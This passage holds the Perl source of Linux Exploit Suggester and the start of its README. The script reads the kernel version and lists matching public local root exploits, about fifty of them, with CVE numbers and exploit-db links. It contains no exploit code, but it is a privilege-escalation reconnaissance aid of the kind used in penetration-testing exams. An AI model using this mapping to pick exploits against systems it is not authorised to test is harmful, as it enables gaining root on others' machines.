30 | my $cve = $exploits{$key}{cve};
31 | my $mlw = $exploits{$key}{mil};
32 | if ( $alt or $cve ) {
33 | print "\n";
34 | }
35 | if ( $alt ) { print " Alt: $alt "; }
36 | if ( $cve ) { print " CVE-$cve"; }
37 | if ( $mlw ) { print "\n Source: $mlw"; }
38 | print "\n";
39 | next EXPLOIT;
40 | }
41 | }
42 | }
43 | exit;
44 |
45 |
46 | ######################
47 | ## extra functions ##
48 | ######################
49 |
50 | sub get_kernel {
51 | my $khost = '';
52 |
53 | if ( exists $opts{k} ) {
54 | $khost = $opts{k};
55 | }
56 | else {
57 | $khost = `uname -r |cut -d"-" -f1`;
58 | chomp $khost;
59 | }
60 |
61 | # partial kernels might be provided by the user,
62 | # such as '2.4' or '2.6.'
63 | my $is_partial = $khost =~ /^\d+\.\d+\.\d/ ? 0 : 1;
64 | if ( $is_partial and substr($khost,-1) ne '.' ) {
65 | $khost .= '.';
66 | }
67 | return ( $khost, $is_partial );
68 | }
69 |
70 | sub usage {
71 | print <<"EOUSAGE";
72 | Linux Exploit Suggester $VERSION
73 | Usage: \t$0 [-h] [-k kernel]
74 |
75 | [-h] help (this message)
76 | [-k] kernel number eg. 2.6.28
77 |
78 | You can also provide a partial kernel version (eg. 2.4)
79 | to see all exploits available.
80 |
81 | EOUSAGE
82 | }
83 |
84 | sub get_exploits {
85 | return (
86 | 'w00t' => {
87 | vuln => [
88 | '2.4.10', '2.4.16', '2.4.17', '2.4.18',
89 | '2.4.19', '2.4.20', '2.4.21',
90 | ]
91 | },
92 | 'brk' => {
93 | vuln => [ '2.4.10', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ],
94 | },
95 | 'ave' => { vuln => [ '2.4.19', '2.4.20' ] },
96 |
97 | 'elflbl' => {
98 | vuln => ['2.4.29'],
99 | mil => 'http://www.exploit-db.com/exploits/744/',
100 | },
101 |
102 | 'elfdump' => { vuln => ['2.4.27'] },
103 | 'elfcd' => { vuln => ['2.6.12'] },
104 | 'expand_stack' => { vuln => ['2.4.29'] },
105 |
106 | 'h00lyshit' => {
107 | vuln => [
108 | '2.6.8', '2.6.10', '2.6.11', '2.6.12',
109 | '2.6.13', '2.6.14', '2.6.15', '2.6.16',
110 | ],
111 | cve => '2006-3626',
112 | mil => 'http://www.exploit-db.com/exploits/2013/',
113 | },
114 |
115 | 'kdump' => { vuln => ['2.6.13'] },
116 | 'km2' => { vuln => [ '2.4.18', '2.4.22' ] },
117 | 'krad' =>
118 | { vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ] },
119 |
120 | 'krad3' => {
121 | vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ],
122 | mil => 'http://exploit-db.com/exploits/1397',
123 | },
124 |
125 | 'local26' => { vuln => ['2.6.13'] },
126 | 'loko' => { vuln => [ '2.4.22', '2.4.23', '2.4.24' ] },
127 |
128 | 'mremap_pte' => {
129 | vuln => [ '2.4.20', '2.2.24', '2.4.25', '2.4.26', '2.4.27' ],
130 | mil => 'http://www.exploit-db.com/exploits/160/',
131 | },
132 |
133 | 'newlocal' => { vuln => [ '2.4.17', '2.4.19' ] },
134 | 'ong_bak' => { vuln => ['2.6.5'] },
135 | 'ptrace' =>
136 | { vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ] },
137 | 'ptrace_kmod' => {
138 | vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ],
139 | cve => '2007-4573',
140 | },
141 | 'ptrace_kmod2' => {
142 | vuln => [
143 | '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31',
144 | '2.6.32', '2.6.33', '2.6.34',
145 | ],
146 | alt => 'ia32syscall,robert_you_suck',
147 | mil => 'http://www.exploit-db.com/exploits/15023/',
148 | cve => '2010-3301',
149 | },
150 | 'ptrace24' => { vuln => ['2.4.9'] },
151 | 'pwned' => { vuln => ['2.6.11'] },
152 | 'py2' => { vuln => [ '2.6.9', '2.6.17', '2.6.15', '2.6.13' ] },
153 | 'raptor_prctl' => {
154 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
155 | cve => '2006-2451',
156 | mil => 'http://www.exploit-db.com/exploits/2031/',
157 | },
158 | 'prctl' => {
159 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
160 | mil => 'http://www.exploit-db.com/exploits/2004/',
161 | },
162 | 'prctl2' => {
163 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
164 | mil => 'http://www.exploit-db.com/exploits/2005/',
165 | },
166 | 'prctl3' => {
167 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
168 | mil => 'http://www.exploit-db.com/exploits/2006/',
169 | },
170 | 'prctl4' => {
171 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
172 | mil => 'http://www.exploit-db.com/exploits/2011/',
173 | },
174 | 'remap' => { vuln => ['2.4.'] },
175 | 'rip' => { vuln => ['2.2.'] },
176 | 'stackgrow2' => { vuln => [ '2.4.29', '2.6.10' ] },
177 | 'uselib24' => {
178 | vuln => [ '2.6.10', '2.4.17', '2.4.22', '2.4.25', '2.4.27', '2.4.29' ]
179 | },
180 | 'newsmp' => { vuln => ['2.6.'] },
181 | 'smpracer' => { vuln => ['2.4.29'] },
182 | 'loginx' => { vuln => ['2.4.22'] },
183 | 'exp.sh' => { vuln => [ '2.6.9', '2.6.10', '2.6.16', '2.6.13' ] },
184 | 'vmsplice1' => {
185 | vuln => [
186 | '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
187 | '2.6.23', '2.6.24', '2.6.24.1',
188 | ],
189 | alt => 'jessica biel',
190 | cve => '2008-0600',
191 | mil => 'http://www.exploit-db.com/exploits/5092',
192 | },
193 | 'vmsplice2' => {
194 | vuln => [ '2.6.23', '2.6.24' ],
195 | alt => 'diane_lane',
196 | cve => '2008-0600',
197 | mil => 'http://www.exploit-db.com/exploits/5093',
198 | },
199 | 'vconsole' => {
200 | vuln => ['2.6.'],
201 | cve => '2009-1046',
202 | },
203 | 'sctp' => {
204 | vuln => ['2.6.26'],
205 | cve => '2008-4113',
206 | },
207 | 'ftrex' => {
208 | vuln => [
209 | '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16',
210 | '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
211 | ],
212 | cve => '2008-4210',
213 | mil => 'http://www.exploit-db.com/exploits/6851',
214 | },
215 | 'exit_notify' => {
216 | vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ],
217 | mil => 'http://www.exploit-db.com/exploits/8369',
218 | },
219 | 'udev' => {
220 | vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ],
221 | alt => 'udev <1.4.1',
222 | cve => '2009-1185',
223 | mil => 'http://www.exploit-db.com/exploits/8478',
224 | },
225 |
226 | 'sock_sendpage2' => {
227 | vuln => [
228 | '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9',
229 | '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
230 | '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
231 | '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
232 | '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
233 | '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0', '2.6.1',
234 | '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7',
235 | '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13',
236 | '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19',
237 | '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25',
238 | '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
239 | ],
240 | alt => 'proto_ops',
241 | cve => '2009-2692',
242 | mil => 'http://www.exploit-db.com/exploits/9436',
243 | },
244 |
245 | 'sock_sendpage' => {
246 | vuln => [
247 | '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9',
248 | '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
249 | '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
250 | '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
251 | '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
252 | '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0', '2.6.1',
253 | '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7',
254 | '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13',
255 | '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19',
256 | '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25',
257 | '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
258 | ],
259 | alt => 'wunderbar_emporium',
260 | cve => '2009-2692',
261 | mil => 'http://www.exploit-db.com/exploits/9435',
262 | },
263 | 'udp_sendmsg_32bit' => {
264 | vuln => [
265 | '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6',
266 | '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12',
267 | '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18',
268 | '2.6.19',
269 | ],
270 | cve => '2009-2698',
271 | mil =>
272 | 'http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c',
273 | },
274 | 'pipe.c_32bit' => {
275 | vuln => [
276 | '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9',
277 | '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
278 | '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
279 | '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
280 | '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
281 | '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.15', '2.6.16',
282 | '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
283 | '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28',
284 | '2.6.29', '2.6.30', '2.6.31',
285 | ],
286 | cve => '2009-3547',
287 | mil =>
288 | 'http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c',
289 | },
290 | 'do_pages_move' => {
291 | vuln => [
292 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
293 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
294 | '2.6.30', '2.6.31',
295 | ],
296 | alt => 'sieve',
297 | cve => '2010-0415',
298 | mil => 'Spenders Enlightenment',
299 | },
300 | 'reiserfs' => {
301 | vuln => [
302 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
303 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
304 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34',
305 | ],
306 | cve => '2010-1146',
307 | mil => 'http://www.exploit-db.com/exploits/12130/',
308 | },
309 | 'can_bcm' => {
310 | vuln => [
311 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
312 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
313 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
314 | '2.6.36',
315 | ],
316 | cve => '2010-2959',
317 | mil => 'http://www.exploit-db.com/exploits/14814/',
318 | },
319 | 'rds' => {
320 | vuln => [
321 | '2.6.30', '2.6.31', '2.6.32', '2.6.33',
322 | '2.6.34', '2.6.35', '2.6.36',
323 | ],
324 | mil => 'http://www.exploit-db.com/exploits/15285/',
325 | cve => '2010-3904',
326 | },
327 | 'half_nelson' => {
328 | vuln => [
329 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
330 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
331 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
332 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
333 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
334 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
335 | '2.6.36',
336 | ],
337 | alt => 'econet',
338 | cve => '2010-3848',
339 | mil => 'http://www.exploit-db.com/exploits/6851',
340 | },
341 | 'half_nelson1' => {
342 | vuln => [
343 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
344 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
345 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
346 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
347 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
348 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
349 | '2.6.36',
350 | ],
351 | alt => 'econet',
352 | cve => '2010-3848',
353 | mil => 'http://www.exploit-db.com/exploits/17787/',
354 | },
355 | 'half_nelson2' => {
356 | vuln => [
357 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
358 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
359 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
360 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
361 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
362 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
363 | '2.6.36',
364 | ],
365 | alt => 'econet',
366 | cve => '2010-3850',
367 | mil => 'http://www.exploit-db.com/exploits/17787/',
368 | },
369 | 'half_nelson3' => {
370 | vuln => [
371 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
372 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
373 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
374 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
375 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
376 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
377 | '2.6.36',
378 | ],
379 | alt => 'econet',
380 | cve => '2010-4073',
381 | mil => 'http://www.exploit-db.com/exploits/17787/',
382 | },
383 | 'caps_to_root' => {
384 | vuln => [ '2.6.34', '2.6.35', '2.6.36' ],
385 | cve => 'n/a',
386 | mil => 'http://www.exploit-db.com/exploits/15916/',
387 | },
388 | 'american-sign-language' => {
389 | vuln => [
390 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
391 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
392 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
393 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
394 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
395 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
396 | '2.6.36',
397 | ],
398 | cve => '2010-4347',
399 | mil => 'http://www.securityfocus.com/bid/45408/',
400 | },
401 | 'pktcdvd' => {
402 | vuln => [
403 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
404 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
405 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
406 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
407 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
408 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
409 | '2.6.36',
410 | ],
411 | cve => '2010-3437',
412 | mil => 'http://www.exploit-db.com/exploits/15150/',
413 | },
414 | 'video4linux' => {
415 | vuln => [
416 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
417 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
418 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
419 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
420 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
421 | '2.6.30', '2.6.31', '2.6.32', '2.6.33',
422 | ],
423 | cve => '2010-3081',
424 | mil => 'http://www.exploit-db.com/exploits/15024/',
425 | },
426 | 'memodipper' => {
427 | vuln => [
428 | '2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4',
429 | '3.0.5', '3.0.6', '3.1.0',
430 | ],
431 | cve => '2012-0056',
432 | mil => 'http://www.exploit-db.com/exploits/18411/',
433 | },
434 | 'semtex' => {
435 | vuln => [
436 | '2.6.37', '2.6.38', '2.6.39', '3.0.0', '3.0.1', '3.0.2',
437 | '3.0.3', '3.0.4', '3.0.5', '3.0.6', '3.1.0',
438 | ],
439 | cve => '2013-2094',
440 | mil => 'http://www.exploit-db.com/download/25444/',
441 | },
442 | 'perf_swevent' => {
443 | vuln => [
444 | '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5',
445 | '3.0.6', '3.1.0', '3.2', '3.3', '3.4.0', '3.4.1',
446 | '3.4.2', '3.4.3', '3.4.4', '3.4.5', '3.4.6', '3.4.8',
447 | '3.4.9', '3.5', '3.6', '3.7', '3.8.0', '3.8.1',
448 | '3.8.2', '3.8.3', '3.8.4', '3.8.5', '3.8.6', '3.8.7',
449 | '3.8.8', '3.8.9',
450 | ],
451 | cve => '2013-2094',
452 | mil => 'http://www.exploit-db.com/download/26131',
453 | },
454 | 'msr' => {
455 | vuln => [
456 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
457 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.27', '2.6.28',
458 | '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34',
459 | '2.6.35', '2.6.36', '2.6.37', '2.6.38', '2.6.39', '3.0.0',
460 | '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5', '3.0.6',
461 | '3.1.0', '3.2', '3.3', '3.4', '3.5', '3.6',
462 | '3.7.0', '3.7.6',
463 | ],
464 | cve => '2013-0268',
465 | mil => 'http://www.exploit-db.com/exploits/27297/',
466 | },
467 | );
468 | }
469 |
470 | __END__
471 | =head1 NAME
472 |
473 | Linux_Exploit_Suggester.pl - A local exploit suggester for linux
474 |
475 | =head1 DESCRIPTION
476 |
477 | This perl script will enumerate the possible exploits available for a given kernel version
478 |
479 | =head1 USAGE
480 | $ Local_Exploit_Checker [-h] [-k kernel]
481 |
482 | [-h] help
483 | [-k] kernel Eg. 2.6.28
484 |
485 | You can also provide a partial kernel version (eg. 2.4)
486 | to see all exploits available.
487 |
488 | =head1 AUTHOR
489 |
490 | Andy (c) 10-07-2009
491 |
492 | Thanks to Brian for bugfixes, and sploit additions.
493 |
494 | =head1 CHANGELOG
495 | 05-09-2013 code cleanup/optimizations and partial kernel feature (garu)
496 |
497 | 28-08-2013 added msr driver (Andy)
498 |
499 | 12-06-2013 added perf_swevent (Andy)
500 |
501 | 23-01-2012 added memodipper (Andy)
502 |
503 | 14-11-2011 bug fix to cut kernel version, plus a few more sploits listed (Brian)
504 |
505 | =cut
506 |
507 | =head1 LICENSE
508 |
509 | Linux Exploit Suggester
510 |
511 | This program is free software; you can redistribute it and/or modify
512 | it under the terms of the GNU General Public License as published by
513 | the Free Software Foundation; either version 2 of the License, or
514 | (at your option) any later version.
515 |
516 | This program is distributed in the hope that it will be useful,
517 | but WITHOUT ANY WARRANTY; without even the implied warranty of
518 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
519 | GNU General Public License for more details.
520 |
521 | You should have received a copy of the GNU General Public License along
522 | with this program; if not, write to the Free Software Foundation, Inc.,
523 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
524 |
525 |
526 | =cut
527 |
528 |
529 |
--------------------------------------------------------------------------------
/packages/linux-exploit-suggester/README.md:
--------------------------------------------------------------------------------
1 | Linux_Exploit_Suggester
2 | =======================
3 |
4 | Linux Exploit Suggester; based on operating system release number.
5 |
6 | This program run without arguments will perform a 'uname -r' to grab the Linux Operating Systems release version,
7 | and return a suggestive list of possible exploits. Nothing fancy, so a patched/back-ported patch may fool this script.
8 |
9 | Additionally possible to provide '-k' flag to manually enter the Kernel Version/Operating System Release Version.
10 |
11 | This script has been extremely useful on site and in exams. Now Open-sourced under GPLv2.
12 |
13 | Sample Output
14 | ==============
15 |